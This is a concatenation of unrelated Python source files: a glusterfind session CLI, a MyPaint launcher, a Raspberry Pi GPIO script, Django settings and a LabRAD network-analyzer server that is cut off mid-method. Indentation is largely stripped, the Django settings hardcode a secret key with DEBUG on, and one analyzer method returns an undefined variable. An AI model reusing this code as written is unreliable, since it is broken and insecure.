# Rename pre status file to actual status file in each node
cmd = [conf.get_opt("nodeagent"),
"post",
args.session,
args.volume,
brick] + \
(["--debug"] if args.debug else [])
elif task == "delete":
# When glusterfind delete, cleanup all the session files/dirs
# from each node.
cmd = [conf.get_opt("nodeagent"),
"delete",
args.session,
args.volume] + \
(["--debug"] if args.debug else [])
if cmd:
p = Process(target=node_cmd,
args=(host, host_uuid, task, cmd, args, opts))
p.start()
pool.append(p)
for num, p in enumerate(pool):
p.join()
if p.exitcode != 0:
logger.warn("Command %s failed in %s" % (task, nodes[num][1]))
if task in ["create", "delete"]:
fail("Command %s failed in %s" % (task, nodes[num][1]))
elif task == "pre" and args.disable_partial:
sys.exit(1)
@cache_output
def get_nodes(volume):
"""
Get the gluster volume info xml output and parse to get
the brick details.
"""
global vol_statusStr
cmd = ["gluster", 'volume', 'info', volume, "--xml"]
_, data, _ = execute(cmd,
exit_msg="Failed to Run Gluster Volume Info",
logger=logger)
tree = etree.fromstring(data)
# Test to check if volume has been deleted after session creation
count_el = tree.find('volInfo/volumes/count')
if int(count_el.text) == 0:
fail("Unable to get volume details", logger=logger)
# this status is used in caller: run_cmd_nodes
vol_statusStr = tree.find('volInfo/volumes/volume/statusStr').text
nodes = []
volume_el = tree.find('volInfo/volumes/volume')
try:
for b in volume_el.findall('bricks/brick'):
nodes.append((b.find('hostUuid').text,
b.find('name').text))
except (ParseError, AttributeError, ValueError) as e:
fail("Failed to parse Volume Info: %s" % e, logger=logger)
return nodes
def _get_args():
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter,
description=PROG_DESCRIPTION)
subparsers = parser.add_subparsers(dest="mode")
# create <SESSION> <VOLUME> [--debug] [--force]
parser_create = subparsers.add_parser('create')
parser_create.add_argument("session", help="Session Name")
parser_create.add_argument("volume", help="Volume Name")
parser_create.add_argument("--debug", help="Debug", action="store_true")
parser_create.add_argument("--force", help="Force option to recreate "
"the session", action="store_true")
parser_create.add_argument("--reset-session-time",
help="Reset Session Time to Current Time",
action="store_true")
# delete <SESSION> <VOLUME> [--debug]
parser_delete = subparsers.add_parser('delete')
parser_delete.add_argument("session", help="Session Name")
parser_delete.add_argument("volume", help="Volume Name")
parser_delete.add_argument("--debug", help="Debug", action="store_true")
# list [--session <SESSION>] [--volume <VOLUME>]
parser_list = subparsers.add_parser('list')
parser_list.add_argument("--session", help="Session Name", default="")
parser_list.add_argument("--volume", help="Volume Name", default="")
parser_list.add_argument("--debug", help="Debug", action="store_true")
# pre <SESSION> <VOLUME> <OUTFILE>
# [--output-prefix <OUTPUT_PREFIX>] [--full]
parser_pre = subparsers.add_parser('pre')
parser_pre.add_argument("session", help="Session Name")
parser_pre.add_argument("volume", help="Volume Name")
parser_pre.add_argument("outfile", help="Output File", action=StoreAbsPath)
parser_pre.add_argument("--debug", help="Debug", action="store_true")
parser_pre.add_argument("--full", help="Full find", action="store_true")
parser_pre.add_argument("--disable-partial", help="Disable Partial find, "
"Fail when one node fails", action="store_true")
parser_pre.add_argument("--output-prefix", help="File prefix in output",
default=".")
parser_pre.add_argument("--regenerate-outfile",
help="Regenerate outfile, discard the outfile "
"generated from last pre command",
action="store_true")
parser_pre.add_argument("-N", "--only-namespace-changes",
help="List only namespace changes",
action="store_true")
# post <SESSION> <VOLUME>
parser_post = subparsers.add_parser('post')
parser_post.add_argument("session", help="Session Name")
parser_post.add_argument("volume", help="Volume Name")
parser_post.add_argument("--debug", help="Debug", action="store_true")
return parser.parse_args()
def ssh_setup(args):
pem_key_path = get_pem_key_path(args.session, args.volume)
if not os.path.exists(pem_key_path):
# Generate ssh-key
cmd = ["ssh-keygen",
"-N",
"",
"-f",
pem_key_path]
execute(cmd,
exit_msg="Unable to generate ssh key %s"
% pem_key_path,
logger=logger)
logger.info("Ssh key generated %s" % pem_key_path)
try:
shutil.copyfile(pem_key_path + ".pub",
os.path.join(conf.get_opt("session_dir"),
".keys",
"%s_%s_secret.pem.pub" % (args.session,
args.volume)))
except (IOError, OSError) as e:
fail("Failed to copy public key to %s: %s"
% (os.path.join(conf.get_opt("session_dir"), ".keys"), e),
logger=logger)
# Copy pub file to all nodes
cmd = ["gluster",
"system::",
"copy",
"file",
"/glusterfind/.keys/%s.pub" % os.path.basename(pem_key_path)]
execute(cmd, exit_msg="Failed to distribute ssh keys", logger=logger)
logger.info("Distributed ssh key to all nodes of Volume")
# Add to authorized_keys file in each node
cmd = ["gluster",
"system::",
"execute",
"add_secret_pub",
"root",
"/glusterfind/.keys/%s.pub" % os.path.basename(pem_key_path)]
execute(cmd,
exit_msg="Failed to add ssh keys to authorized_keys file",
logger=logger)
logger.info("Ssh key added to authorized_keys of Volume nodes")
def mode_create(session_dir, args):
logger.debug("Init is called - Session: %s, Volume: %s"
% (args.session, args.volume))
cmd = ["gluster", 'volume', 'info', args.volume, "--xml"]
_, data, _ = execute(cmd,
exit_msg="Failed to Run Gluster Volume Info",
logger=logger)
try:
tree = etree.fromstring(data)
statusStr = tree.find('volInfo/volumes/volume/statusStr').text
except (ParseError, AttributeError) as e:
fail("Invalid Volume: %s" % e, logger=logger)
if statusStr != "Started":
fail("Volume %s is not online" % args.volume, logger=logger)
mkdirp(session_dir, exit_on_err=True, logger=logger)
mkdirp(os.path.join(session_dir, args.volume), exit_on_err=True,
logger=logger)
status_file = os.path.join(session_dir, args.volume, "status")
if os.path.exists(status_file) and not args.force:
fail("Session %s already created" % args.session, logger=logger)
if not os.path.exists(status_file) or args.force:
ssh_setup(args)
execute(["gluster", "volume", "set",
args.volume, "build-pgfid", "on"],
exit_msg="Failed to set volume option build-pgfid on",
logger=logger)
logger.info("Volume option set %s, build-pgfid on" % args.volume)
execute(["gluster", "volume", "set",
args.volume, "changelog.changelog", "on"],
exit_msg="Failed to set volume option "
"changelog.changelog on", logger=logger)
logger.info("Volume option set %s, changelog.changelog on"
% args.volume)
execute(["gluster", "volume", "set",
args.volume, "changelog.capture-del-path", "on"],
exit_msg="Failed to set volume option "
"changelog.capture-del-path on", logger=logger)
logger.info("Volume option set %s, changelog.capture-del-path on"
% args.volume)
# Add Rollover time to current time to make sure changelogs
# will be available if we use this time as start time
time_to_update = int(time.time()) + get_changelog_rollover_time(
args.volume)
run_cmd_nodes("create", args, time_to_update=str(time_to_update))
if not os.path.exists(status_file) or args.reset_session_time:
with open(status_file, "w", buffering=0) as f:
f.write(str(time_to_update))
sys.stdout.write("Session %s created with volume %s\n" %
(args.session, args.volume))
sys.exit(0)
def mode_pre(session_dir, args):
"""
Read from Session file and write to session.pre file
"""
endtime_to_update = int(time.time()) - get_changelog_rollover_time(
args.volume)
status_file = os.path.join(session_dir, args.volume, "status")
status_file_pre = status_file + ".pre"
mkdirp(os.path.dirname(args.outfile), exit_on_err=True, logger=logger)
# If Pre status file exists and running pre command again
if os.path.exists(status_file_pre) and not args.regenerate_outfile:
fail("Post command is not run after last pre, "
"use --regenerate-outfile")
start = 0
try:
with open(status_file) as f:
start = int(f.read().strip())
except ValueError:
pass
except (OSError, IOError) as e:
fail("Error Opening Session file %s: %s"
% (status_file, e), logger=logger)
logger.debug("Pre is called - Session: %s, Volume: %s, "
"Start time: %s, End time: %s"
% (args.session, args.volume, start, endtime_to_update))
run_cmd_nodes("pre", args, start=start)
# Merger
if args.full:
cmd = ["sort", "-u"] + node_outfiles + ["-o", args.outfile]
execute(cmd,
exit_msg="Failed to merge output files "
"collected from nodes", logger=logger)
else:
# Read each Changelogs db and generate finaldb
create_file(args.outfile, exit_on_err=True, logger=logger)
outfilemerger = OutputMerger(args.outfile + ".db", node_outfiles)
with open(args.outfile, "a") as f:
for row in outfilemerger.get():
# Multiple paths in case of Hardlinks
paths = row[1].split(",")
for p in paths:
if p == "" or p.replace("%2F%2F","%2F") == \
row[2].replace("%2F%2F","%2F"):
continue
f.write("%s %s %s\n" % (row[0], p, row[2]))
try:
os.remove(args.outfile + ".db")
except (IOError, OSError):
pass
run_cmd_nodes("cleanup", args)
with open(status_file_pre, "w", buffering=0) as f:
f.write(str(endtime_to_update))
sys.stdout.write("Generated output file %s\n" % args.outfile)
def mode_post(session_dir, args):
"""
If pre session file exists, overwrite session file
If pre session file does not exists, return ERROR
"""
status_file = os.path.join(session_dir, args.volume, "status")
logger.debug("Post is called - Session: %s, Volume: %s"
% (args.session, args.volume))
status_file_pre = status_file + ".pre"
if os.path.exists(status_file_pre):
run_cmd_nodes("post", args)
os.rename(status_file_pre, status_file)
sys.stdout.write("Session %s with volume %s updated\n" %
(args.session, args.volume))
sys.exit(0)
else:
fail("Pre script is not run", logger=logger)
def mode_delete(session_dir, args):
run_cmd_nodes("delete", args)
shutil.rmtree(os.path.join(session_dir, args.volume),
onerror=handle_rm_error)
sys.stdout.write("Session %s with volume %s deleted\n" %
(args.session, args.volume))
# If the session contains only this volume, then cleanup the
# session directory. If a session contains multiple volumes
# then os.rmdir will fail with ENOTEMPTY
try:
os.rmdir(session_dir)
except OSError as e:
if not e.errno == ENOTEMPTY:
logger.warn("Failed to delete session directory: %s" % e)
def mode_list(session_dir, args):
"""
List available sessions to stdout, if session name is set
only list that session.
"""
if args.session:
if not os.path.exists(os.path.join(session_dir, args.session)):
fail("Invalid Session", logger=logger)
sessions = [args.session]
else:
sessions = []
for d in os.listdir(session_dir):
if d != ".keys":
sessions.append(d)
output = []
for session in sessions:
# Session Volume Last Processed
volnames = os.listdir(os.path.join(session_dir, session))
for volname in volnames:
if args.volume and args.volume != volname:
continue
status_file = os.path.join(session_dir, session, volname, "status")
last_processed = None
try:
with open(status_file) as f:
last_processed = f.read().strip()
except (OSError, IOError) as e:
if e.errno == ENOENT:
continue
else:
raise
output.append((session, volname, last_processed))
if output:
sys.stdout.write("%s %s %s\n" % ("SESSION".ljust(25),
"VOLUME".ljust(25),
"SESSION TIME".ljust(25)))
sys.stdout.write("-"*75)
sys.stdout.write("\n")
for session, volname, last_processed in output:
sess_time = 'Session Corrupted'
if last_processed:
try:
sess_time = human_time(last_processed)
except TypeError:
sess_time = 'Session Corrupted'
sys.stdout.write("%s %s %s\n" % (session.ljust(25),
volname.ljust(25),
sess_time.ljust(25)))
if not output:
if args.session or args.volume:
fail("Invalid Session", logger=logger)
else:
sys.stdout.write("No sessions found.\n")
def main():
args = _get_args()
mkdirp(conf.get_opt("session_dir"), exit_on_err=True)
if args.mode == "list":
session_dir = conf.get_opt("session_dir")
else:
session_dir = os.path.join(conf.get_opt("session_dir"),
args.session)
if not os.path.exists(session_dir) and args.mode not in ["create", "list"]:
fail("Invalid session %s" % args.session)
vol_dir = os.path.join(session_dir, args.volume)
if not os.path.exists(vol_dir) and args.mode not in ["create", "list"]:
fail("Session %s not created with volume %s" %
(args.session, args.volume))
mkdirp(os.path.join(conf.get_opt("log_dir"), args.session, args.volume),
exit_on_err=True)
log_file = os.path.join(conf.get_opt("log_dir"),
args.session,
args.volume,
"cli.log")
setup_logger(logger, log_file, args.debug)
# globals() will have all the functions already defined.
# mode_<args.mode> will be the function name to be called
globals()["mode_" + args.mode](session_dir, args)
|
"""Platform-dependent setup, and program launch.
This script does all the platform dependent stuff.
Its main task is to figure out where MyPaint's python modules are,
and set up paths for i18n message catalogs.
It then passes control to gui.main.main() for command line launching.
"""
import sys
import os
import re
import logging
logger = logging.getLogger('mypaint')
class ColorFormatter (logging.Formatter):
"""Minimal ANSI formatter, for use with non-Windows console logging."""
# ANSI control sequences for various things
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
FG = 30
BG = 40
LEVELCOL = {
"DEBUG": "\033[%02dm" % (FG+BLUE,),
"INFO": "\033[%02dm" % (FG+GREEN,),
"WARNING": "\033[%02dm" % (FG+YELLOW,),
"ERROR": "\033[%02dm" % (FG+RED,),
"CRITICAL": "\033[%02d;%02dm" % (FG+RED, BG+BLACK),
}
BOLD = "\033[01m"
BOLDOFF = "\033[22m"
ITALIC = "\033[03m"
ITALICOFF = "\033[23m"
UNDERLINE = "\033[04m"
UNDERLINEOFF = "\033[24m"
RESET = "\033[0m"
# Replace tokens in message format strings to highlight interpolations
REPLACE_BOLD = lambda m: (ColorFormatter.BOLD +
m.group(0) +
ColorFormatter.BOLDOFF)
REPLACE_UNDERLINE = lambda m: (ColorFormatter.UNDERLINE +
m.group(0) +
ColorFormatter.UNDERLINEOFF)
TOKEN_FORMATTING = [
(re.compile(r'%r'), REPLACE_BOLD),
(re.compile(r'%s'), REPLACE_BOLD),
(re.compile(r'%\+?[0-9.]*d'), REPLACE_BOLD),
(re.compile(r'%\+?[0-9.]*f'), REPLACE_BOLD),
]
def format(self, record):
record = logging.makeLogRecord(record.__dict__)
msg = record.msg
for token_re, repl in self.TOKEN_FORMATTING:
msg = token_re.sub(repl, msg)
record.msg = msg
record.reset = self.RESET
record.bold = self.BOLD
record.boldOff = self.BOLDOFF
record.italic = self.ITALIC
record.italicOff = self.ITALICOFF
record.underline = self.UNDERLINE
record.underlineOff = self.UNDERLINEOFF
record.levelCol = ""
if record.levelname in self.LEVELCOL:
record.levelCol = self.LEVELCOL[record.levelname]
return super(ColorFormatter, self).format(record)
def win32_unicode_argv():
# fix for https://gna.org/bugs/?17739
# code mostly comes from http://code.activestate.com/recipes/572200/
"""Uses shell32.GetCommandLineArgvW to get sys.argv as a list of Unicode
strings.
Versions 2.x of Python don't support Unicode in sys.argv on
Windows, with the underlying Windows API instead replacing multi-byte
characters with '?'.
"""
try:
from ctypes import POINTER, byref, cdll, c_int, windll
from ctypes.wintypes import LPCWSTR, LPWSTR
GetCommandLineW = cdll.kernel32.GetCommandLineW
GetCommandLineW.argtypes = []
GetCommandLineW.restype = LPCWSTR
CommandLineToArgvW = windll.shell32.CommandLineToArgvW
CommandLineToArgvW.argtypes = [LPCWSTR, POINTER(c_int)]
CommandLineToArgvW.restype = POINTER(LPWSTR)
cmd = GetCommandLineW()
argc = c_int(0)
argv = CommandLineToArgvW(cmd, byref(argc))
if argc.value > 0:
# Remove Python executable if present
if argc.value - len(sys.argv) == 1:
start = 1
else:
start = 0
return [argv[i] for i in xrange(start, argc.value)]
except:
logger.exception(
"Specialized Win32 argument handling failed. Please "
"help us determine if this code is still needed, "
"and submit patches if it's not."
)
logger.warning("Falling back to POSIX-style argument handling")
return [s.decode(sys.getfilesystemencoding()) for s in sys.argv]
def get_paths():
join = os.path.join
# Convert sys.argv to a list of unicode objects
# (actually converting sys.argv confuses gtk, thus we add a new variable)
if sys.platform == 'win32':
sys.argv_unicode = win32_unicode_argv()
else:
sys.argv_unicode = [s.decode(sys.getfilesystemencoding())
for s in sys.argv]
# Script and its location, in canonical absolute form
scriptfile = os.path.realpath(sys.argv_unicode[0])
scriptfile = os.path.abspath(os.path.normpath(scriptfile))
scriptdir = os.path.dirname(scriptfile)
assert isinstance(scriptfile, unicode)
assert isinstance(scriptdir, unicode)
# Determine the installation's directory layout.
# Assume a conventional POSIX-style directory structure first,
# where the launch script resides in $prefix/bin/.
dir_install = scriptdir
prefix = os.path.dirname(dir_install)
assert isinstance(prefix, unicode)
libpath = join(prefix, 'share', 'mypaint')
localepath = join(prefix, 'share', 'locale')
localepath_brushlib = localepath
iconspath = join(prefix, 'share', 'icons')
if os.path.exists(libpath) and os.path.exists(iconspath):
# This is a normal POSIX-like installation.
# The Windows standalone distribution works like this too.
libpath_compiled = join(prefix, 'lib', 'mypaint') # or lib64?
sys.path.insert(0, libpath)
sys.path.insert(0, libpath_compiled)
sys.path.insert(0, join(prefix, 'share')) # for libmypaint
logger.info("Installation layout: conventional POSIX-like structure "
"with prefix %r",
prefix)
elif all(map(os.path.exists, ['brushlib', 'desktop', 'gui', 'lib'])):
# Testing from within the source tree.
prefix = None
libpath = u'.'
iconspath = u'desktop/icons'
localepath = 'po'
localepath_brushlib = 'brushlib/po'
logger.info("Installation layout: not installed, "
"testing from within the source tree")
elif sys.platform == 'win32':
prefix = None
        # From py2exe's point of view, all executables live in the
        # root of the install dir.
# XXX: are py2exe builds still relevant? The 1.2.0-beta Windows
# installers are kitchen sink affairs.
libpath = os.path.realpath(scriptdir)
sys.path.insert(0, libpath)
        sys.path.insert(0, join(libpath, 'share'))  # for libmypaint
localepath = join(libpath, 'share', 'locale')
localepath_brushlib = localepath
iconspath = join(libpath, 'share', 'icons')
logger.info("Installation layout: Windows fallback, assuming py2exe")
else:
logger.critical("Installation layout: unknown!")
raise RuntimeError("Unknown install type; could not determine paths")
assert isinstance(libpath, unicode)
datapath = libpath
if not os.path.isdir(join(datapath, 'brushes')):
logger.critical('Default brush collection not found!')
logger.critical('It should have been here: %r', datapath)
sys.exit(1)
# Old style config file and user data locations.
# Return None if using XDG will be correct.
if sys.platform == 'win32':
old_confpath = None
else:
from lib import fileutils
homepath = fileutils.expanduser_unicode(u'~')
old_confpath = join(homepath, '.mypaint/')
if old_confpath:
if not os.path.isdir(old_confpath):
old_confpath = None
else:
logger.info("There is an old-style configuration area in %r",
old_confpath)
logger.info("Its contents can be migrated to $XDG_CONFIG_HOME "
"and $XDG_DATA_HOME if you wish.")
logger.info("See the XDG Base Directory Specification for info.")
assert isinstance(old_confpath, unicode) or old_confpath is None
assert isinstance(datapath, unicode)
assert isinstance(iconspath, unicode)
return datapath, iconspath, old_confpath, localepath, localepath_brushlib
def init_gettext(localepath, localepath_brushlib):
"""Intialize locales and gettext.
This must be done before importing any translated python modules
(to get global strings translated, especially brushsettings.py).
"""
import gettext
import locale
import lib.i18n
# Required in Windows for the "Region and Language" settings
# to take effect.
lib.i18n.set_i18n_envvars()
lib.i18n.fixup_i18n_envvars()
# Internationalization
# Source of many a problem down the line, so lotsa debugging here.
logger.debug("localepath: %r", localepath)
logger.debug("localepath_brushlib: %r", localepath_brushlib)
logger.debug("getdefaultlocale(): %r", locale.getdefaultlocale())
# Set the user's preferred locale.
# https://docs.python.org/2/library/locale.html
# Required in Windows for the "Region and Language" settings
# to take effect.
try:
setlocale_result = locale.setlocale(locale.LC_ALL, '')
except locale.Error:
logger.exception("setlocale(LC_ALL, '') failed")
else:
logger.debug("setlocale(LC_ALL, ''): %r", setlocale_result)
# More debugging: show the state after setlocale().
logger.debug(
"getpreferredencoding(): %r",
locale.getpreferredencoding(do_setlocale=False),
)
locale_categories = [
s for s in dir(locale)
if s.startswith("LC_") and s != "LC_ALL"
]
for category in sorted(locale_categories):
logger.debug(
"getlocale(%s): %r",
category,
locale.getlocale(getattr(locale, category)),
)
# Low-level bindtextdomain with paths.
# This is still required to hook GtkBuilder up with translated
# strings; the gettext() way doesn't cut it for external stuff
# yanked in over GI.
# https://bugzilla.gnome.org/show_bug.cgi?id=574520#c26
bindtextdomain = None
bind_textdomain_codeset = None
textdomain = None
# Try the POSIX/Linux way first.
try:
bindtextdomain = locale.bindtextdomain
bind_textdomain_codeset = locale.bind_textdomain_codeset
textdomain = locale.textdomain
except AttributeError:
logger.warning(
"No bindtextdomain builtins found in module 'locale'."
)
logger.info(
"Trying platform-specific fallback hacks to find "
"bindtextdomain funcs.",
)
# Windows Python binaries tend not to expose bindtextdomain and
# its buddies anywhere they can be called.
if sys.platform == 'win32':
libintl = None
import ctypes
for libname in [
                'libintl-8.dll',  # native for MSYS2's MINGW32
'libintl.dll', # no known cases, but a potential fallback
'intl.dll', # some old recipes off the internet
]:
try:
libintl = ctypes.cdll.LoadLibrary(libname)
bindtextdomain = libintl.bindtextdomain
bindtextdomain.argtypes = (
ctypes.c_char_p,
ctypes.c_char_p,
)
bindtextdomain.restype = ctypes.c_char_p
bind_textdomain_codeset = libintl.bind_textdomain_codeset
bind_textdomain_codeset.argtypes = (
ctypes.c_char_p,
ctypes.c_char_p,
)
bind_textdomain_codeset.restype = ctypes.c_char_p
textdomain = libintl.textdomain
textdomain.argtypes = (
ctypes.c_char_p,
)
textdomain.restype = ctypes.c_char_p
except:
logger.exception(
"Windows: attempt to load bindtextdomain funcs "
"from %r failed (ctypes)",
libname,
)
else:
logger.info(
"Windows: found working bindtextdomain funcs "
"in %r (ctypes)",
libname,
)
break
else:
logger.error(
"No platform-specific fallback for locating bindtextdomain "
"is known for %r",
sys.platform,
)
# Bind text domains, i.e. tell libintl+GtkBuilder and Python's where
# to find message catalogs containing translations.
textdomains = [
("mypaint", localepath),
("libmypaint", localepath_brushlib),
]
defaultdom = "mypaint"
codeset = "UTF-8"
for dom, path in textdomains:
# Some people choose not to install any translation files.
if not os.path.isdir(path):
logger.warning(
"No translations for %s. Missing locale dir %r.",
dom, path,
)
continue
# Only call the C library gettext setup funcs if there's a
# complete set from the same source.
# Required for translatable strings in GtkBuilder XML
# to be translated.
if bindtextdomain and bind_textdomain_codeset and textdomain:
assert os.path.exists(path)
assert os.path.isdir(path)
p = bindtextdomain(dom, path)
c = bind_textdomain_codeset(dom, codeset)
logger.debug("C bindtextdomain(%r, %r): %r", dom, path, p)
logger.debug(
"C bind_textdomain_codeset(%r, %r): %r",
dom, codeset, c,
)
# Call the implementations in Python's standard gettext module
# too. This has proper cross-platform support, but it only
# initializes the native Python "gettext" module.
# Required for marked strings in Python source to be translated.
# See http://docs.python.org/release/2.7/library/locale.html
p = gettext.bindtextdomain(dom, path)
c = gettext.bind_textdomain_codeset(dom, codeset)
logger.debug("Python bindtextdomain(%r, %r): %r", dom, path, p)
logger.debug(
"Python bind_textdomain_codeset(%r, %r): %r",
dom, codeset, c,
)
if bindtextdomain and bind_textdomain_codeset and textdomain:
d = textdomain(defaultdom)
logger.debug("C textdomain(%r): %r", defaultdom, d)
d = gettext.textdomain(defaultdom)
logger.debug("Python textdomain(%r): %r", defaultdom, d)
if __name__ == '__main__':
# Console logging
log_format = "%(levelname)s: %(name)s: %(message)s"
if sys.platform == 'win32':
# Windows doesn't understand ANSI by default.
console_handler = logging.StreamHandler(stream=sys.stderr)
console_formatter = logging.Formatter(log_format)
else:
# Assume POSIX.
# Clone stderr so that later reassignment of sys.stderr won't affect
# logger if --logfile is used.
stderr_fd = os.dup(sys.stderr.fileno())
stderr_fp = os.fdopen(stderr_fd, 'ab', 0)
# Pretty colors.
console_handler = logging.StreamHandler(stream=stderr_fp)
if stderr_fp.isatty():
log_format = (
"%(levelCol)s%(levelname)s: "
"%(bold)s%(name)s%(reset)s%(levelCol)s: "
"%(message)s%(reset)s")
console_formatter = ColorFormatter(log_format)
else:
console_formatter = logging.Formatter(log_format)
console_handler.setFormatter(console_formatter)
logging_level = logging.INFO
if os.environ.get("MYPAINT_DEBUG", False):
logging_level = logging.DEBUG
root_logger = logging.getLogger(None)
root_logger.addHandler(console_handler)
root_logger.setLevel(logging_level)
if logging_level == logging.DEBUG:
logger.info("Debugging output enabled via MYPAINT_DEBUG")
# Path determination
datapath, iconspath, old_confpath, localepath, localepath_brushlib \
= get_paths()
logger.debug('datapath: %r', datapath)
logger.debug('iconspath: %r', iconspath)
logger.debug('old_confpath: %r', old_confpath)
logger.debug('localepath: %r', localepath)
logger.debug('localepath_brushlib: %r', localepath_brushlib)
# Locale setting
init_gettext(localepath, localepath_brushlib)
# Allow an override version string to be burned in during build. Comes
# from an active repository's git information and build timestamp, or
# the release_info file from a tarball release.
try:
version = MYPAINT_VERSION_CEREMONIAL
except NameError:
version = None
# Start the app.
from gui import main
main.main(datapath, iconspath, old_confpath, version=version)
|
import RPi.GPIO as GPIO
import time
pin = 12
time0 = 0
def actualizar(pinx):
    global time0  # time0 is reassigned below; without this it would be local
    time1 = time.time()
    print("DTime = " + str(time1 - time0))
    time0 = time1
if __name__ == "__main__":
GPIO.setmode(GPIO.BOARD)
GPIO.setup(pin, GPIO.IN) #pull_up_down=GPIO.PUD_DOWN
GPIO.add_event_detect(pin, GPIO.FALLING, callback=actualizar) # add bounce time ?
raw_input("")
|
"""
Django settings for apartment_manage project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'v!wnqkg5c7!f#12^^)x6m!44ph@o7p7fl9hz-s+_@nyu8_#^+0'
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'apartment_manage.urls'
WSGI_APPLICATION = 'apartment_manage.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
|
ENVS = [
{
"name" : "DEV",
"label" : "DEV",
"id" : 2,
"prior" : "Library",
"created" : "12-12-2012",
},
{
"name" : "Library",
"label" : "Library",
"id" : 1,
"prior" : "None",
"created" : "12-12-2012",
}
]
|
"""
[info]
name = Agilent N5230A Network Analyzer
version = 0.10.3
description = Four channel 5230A PNA-L network analyzer server
[startup]
cmdline = %PYTHON% %FILE%
timeout = 20
[shutdown]
message = 987654321
timeout = 5
"""
import os
if __file__ in [f for f in os.listdir('.') if os.path.isfile(f)]:
# This is executed when the script is loaded by the labradnode.
SCRIPT_PATH = os.path.dirname(os.getcwd())
else:
# This is executed if the script is started by clicking or
# from a command line.
SCRIPT_PATH = os.path.dirname(__file__)
LABRAD_PATH = SCRIPT_PATH.rsplit('LabRAD', 1)[0]
import sys
if LABRAD_PATH not in sys.path:
sys.path.append(LABRAD_PATH)
import numpy
from labrad.gpib import GPIBManagedServer, GPIBDeviceWrapper
from labrad.server import setting, returnValue
import labrad.units as units
from LabRAD.Servers.Utilities.general import sleep
class AgilentN5230AServer(GPIBManagedServer):
name = 'Agilent N5230A Network Analyzer'
deviceName = 'AGILENT TECHNOLOGIES N5230A'
deviceWrapper = GPIBDeviceWrapper
@setting(600, 'Preset')
def preset(self, c):
"""Performs preset on network analyzer."""
dev = self.selectedDevice(c)
yield dev.write('SYSTem:PRESet')
yield sleep(0.1)
@setting(601, 'Power Output', pow='b', returns='b')
def power_output(self, c, pow=None):
"""Turn output power on or off, or query state."""
dev = self.selectedDevice(c)
if pow is None:
resp = yield dev.query('OUTP?')
pow = bool(int(resp))
else:
if pow:
yield dev.write('OUTP ON')
else:
yield dev.write('OUTP OFF')
returnValue(pow)
@setting(602, 'Center Frequency', cfreq='v[Hz]', returns='v[Hz]')
def center_frequency(self, c, cfreq=None):
"""Set or get the sweep center frequency."""
dev = self.selectedDevice(c)
if cfreq is None:
resp = yield dev.query('SENSe1:FREQuency:CENTer?')
cfreq = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:CENTer %i' %cfreq['Hz'])
returnValue(cfreq)
@setting(603, 'Frequency Span', span='v[Hz]', returns='v[Hz]')
def frequency_span(self, c, span=None):
"""Set or get the sweep center frequency."""
dev = self.selectedDevice(c)
if span is None:
resp = yield dev.query('SENSe1:FREQuency:SPAN')
span = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:SPAN %i' %span['Hz'])
returnValue(cfreq)
@setting(604, 'Start Frequency', start='v[Hz]', returns='v[Hz]')
def start_frequency(self, c, start=None):
"""Set or get sweep start frequency."""
dev = self.selectedDevice(c)
if start is None:
resp = yield dev.query('SENSe1:FREQuency:STARt?')
start = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:STARt %i' %start['Hz'])
returnValue(start)
@setting(605, 'Stop Frequency', stop='v[Hz]', returns='v[Hz]')
def stop_frequency(self, c, stop=None):
"""Set or get sweep stop frequency."""
dev = self.selectedDevice(c)
if stop is None:
resp = yield dev.query('SENSe1:FREQuency:STOP?')
stop = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:STOP %i' %stop['Hz'])
returnValue(stop)
@setting(606, 'Sweep Type', stype='s', returns='s')
def sweep_type(self, c, stype=None):
"""
Set or get the frequency sweep type. 'LIN' - for linear,
'CW' - for single frequency.
"""
dev = self.selectedDevice(c)
if stype is None:
stype = yield dev.query('SENSe1:SWEep:TYPE?')
else:
if (stype.upper() != 'CW') and (stype.upper() != 'LIN'):
raise ValueError('Unknown sweep type: ' + str(stype) +
'. Please use "LIN" or "CW".')
else:
yield dev.write('SENSe1:SWEep:TYPE ' + stype)
returnValue(stype)
@setting(607, 'IF Bandwidth', bw='v[Hz]', returns='v[Hz]')
def if_bandwidth(self, c, bw=None):
"""Set or get the IF bandwidth."""
dev = self.selectedDevice(c)
if bw is None:
resp = yield dev.query('SENSe1:BANDwidth?')
bw = float(resp) * units.Hz
else:
yield dev.write('SENSe1:BANDwidth %i' %bw['Hz'])
        returnValue(bw)
@setting(608, 'Average Mode', avg='b', returns='b')
def average_mode(self, c, avg=None):
"""Turn sweep averaging on or off, or query state."""
dev = self.selectedDevice(c)
if avg is None:
resp = yield dev.query('SENSe1:AVERage?')
avg = bool(int(resp))
else:
if avg:
yield dev.write('SENSe1:AVERage ON')
else:
yield dev.write('SENSe1:AVERage OFF')
returnValue(avg)
@setting(609, 'Restart Averaging')
def restart_averaging(self, c):
"""Clears and restarts trace averaging on the current sweep."""
dev = self.selectedDevice(c)
yield dev.write('SENSe1:AVERage:CLEar')
@setting(610, 'Average Points', count='w', returns='w')
def average_points(self, c, count=None):
"""
Set or get the number of measurements to combine for an average.
"""
